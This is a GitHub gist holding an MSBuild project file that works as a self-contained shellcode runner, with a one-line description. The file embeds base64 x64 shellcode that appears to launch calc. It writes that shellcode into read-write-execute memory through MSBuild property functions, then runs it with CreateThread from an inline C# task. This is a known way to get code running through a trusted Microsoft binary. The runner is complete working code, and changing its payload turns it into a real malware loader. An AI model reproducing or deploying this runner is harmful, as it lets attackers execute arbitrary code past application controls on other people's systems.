Last active
November 19, 2025 18:28
-
-
Save secdev02/1268a4738a024b8719a7a1bc635fd182 to your computer and use it in GitHub Desktop.
Self Contained MSBuild ShellCode Runner Example - Using a mashup of weird tricks.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Call ANY .NET API --> | |
| <!-- | |
| Author: Casey Smith, Twitter: @_subTee | |
| License: BSD 3-Clause | |
| Full Working Details Here: https://www.youtube.com/watch?v=vj_rvLVpqg8 | |
| --> | |
| <!-- set MSBUILDENABLEALLPROPERTYFUNCTIONS=1 --> | |
| <!-- | |
| $env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1 | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe basic.xml | |
| I added a breakpoint prefix here for testing.. | |
| byte[] shellcode = new byte[273] { | |
| 0xcc,0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52, | |
| 0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, | |
| 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9, | |
| 0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41, | |
| 0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48, | |
| 0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, | |
| 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48, | |
| 0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0, | |
| 0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c, | |
| 0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, | |
| 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04, | |
| 0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59, | |
| 0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48, | |
| 0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, | |
| 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f, | |
| 0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, | |
| 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb, | |
| 0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, | |
| 0x63,0x00 }; | |
| zPxIg+Tw6MAAAABBUUFQUFZIMNJLSJJSYEILUHHII1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgS | |
| <Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode> | |
| --> | |
| <UsingTask TaskName="CreateThreadTask" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"> | |
| <ParameterGroup> | |
| <ShellcodeAddress ParameterType="System.String" Required="true" /> | |
| <ThreadHandle ParameterType="System.String" Output="true" /> | |
| </ParameterGroup> | |
| <Task> | |
| <Reference Include="System" /> | |
| <Reference Include="System.Runtime.InteropServices" /> | |
| <Code Type="Class" Language="cs"> | |
| <![CDATA[ | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| public class CreateThreadTask : Task | |
| { | |
| [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] | |
| static extern IntPtr LoadLibrary(string lpFileName); | |
| [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)] | |
| static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); | |
| [UnmanagedFunctionPointer(CallingConvention.StdCall)] | |
| delegate IntPtr CreateThreadDelegate( | |
| IntPtr lpThreadAttributes, | |
| UIntPtr dwStackSize, | |
| IntPtr lpStartAddress, | |
| IntPtr lpParameter, | |
| uint dwCreationFlags, | |
| out uint lpThreadId | |
| ); | |
| [Required] | |
| public string ShellcodeAddress { get; set; } | |
| [Output] | |
| public string ThreadHandle { get; set; } | |
| public override bool Execute() | |
| { | |
| IntPtr kernel32 = LoadLibrary("kernel32.dll"); | |
| if (kernel32 == IntPtr.Zero) | |
| { | |
| Log.LogError("Failed to load kernel32.dll"); | |
| return false; | |
| } | |
| IntPtr createThreadAddr = GetProcAddress(kernel32, "CreateThread"); | |
| if (createThreadAddr == IntPtr.Zero) | |
| { | |
| Log.LogError("Failed to get CreateThread address"); | |
| return false; | |
| } | |
| var createThreadDelegate = (CreateThreadDelegate)Marshal.GetDelegateForFunctionPointer( | |
| createThreadAddr, | |
| typeof(CreateThreadDelegate) | |
| ); | |
| IntPtr shellcodePtr = new IntPtr(long.Parse(ShellcodeAddress, System.Globalization.NumberStyles.HexNumber)); | |
| uint threadId; | |
| IntPtr hThread = createThreadDelegate( | |
| IntPtr.Zero, | |
| UIntPtr.Zero, | |
| shellcodePtr, | |
| IntPtr.Zero, | |
| 0, | |
| out threadId | |
| ); | |
| ThreadHandle = hThread.ToString("X"); | |
| Log.LogMessage(MessageImportance.High, "Thread Handle: 0x" + ThreadHandle); | |
| Log.LogMessage(MessageImportance.High, "Thread ID: " + threadId.ToString()); | |
| return true; | |
| } | |
| } | |
| ]]> | |
| </Code> | |
| </Task> | |
| </UsingTask> | |
| <Target Name="Hello"> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.IO'))" /> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.IO.MemoryMappedFiles'))" /> | |
| <Message Text="$([System.Reflection.Assembly]::Load('System.Runtime.InteropServices'))" /> | |
| <PropertyGroup> | |
| <MappedFileName>1c9360ac-dc0d-4cd8-bf32-c4380855b733</MappedFileName> | |
| <Shellcode>/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYwA=</Shellcode> | |
| <CreateMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::CreateNew($(MappedFileName), $([System.Int64]::Parse(272)),$([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)))</CreateMemoryMappedFile> | |
| <WriteToMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream().Write($([System.Convert]::FromBase64String($(Shellcode))), 0, 272))</WriteToMemoryMappedFile> | |
| <GetRWXIntPtrMemoryMappedFile>$([System.IO.MemoryMappedFiles.MemoryMappedFile]::OpenExisting($(MappedFileName), $([System.IO.MemoryMappedFiles.MemoryMappedFileRights]::FullControl)).CreateViewStream($([System.Int64]::Parse(0)), $([System.Int64]::Parse(272)), $([System.IO.MemoryMappedFiles.MemoryMappedFileAccess]::ReadWriteExecute)).SafeMemoryMappedViewHandle.DangerousGetHandle().ToString("X"))</GetRWXIntPtrMemoryMappedFile> | |
| <MSBuildPID>$([System.Diagnostics.Process]::GetCurrentProcess().Id)</MSBuildPID> | |
| </PropertyGroup> | |
| <Message Text="$(CreateMemoryMappedFile)" /> | |
| <Message Text="Current MSBuild Process ID: $(MSBuildPID)" Importance="high" /> | |
| <Message Text="$([System.Console]::WriteLine('Attach Debugger'))" /> | |
| <Message Text="$([System.Console]::ReadLine())" /> | |
| <Message Text="Shellcode Address: 0x$(GetRWXIntPtrMemoryMappedFile)" Importance="high" /> | |
| <CreateThreadTask ShellcodeAddress="$(GetRWXIntPtrMemoryMappedFile)"> | |
| <Output TaskParameter="ThreadHandle" PropertyName="ThreadHandleResult" /> | |
| </CreateThreadTask> | |
| <Message Importance="high" Text="Thread created successfully! Handle: 0x$(ThreadHandleResult)" /> | |
| <Message Text="$([System.Console]::ReadLine())" /> | |
| </Target> | |
| </Project> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This is a single file that executes shellcode | |
| Its an example of some of the capabilities of MSbuild | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment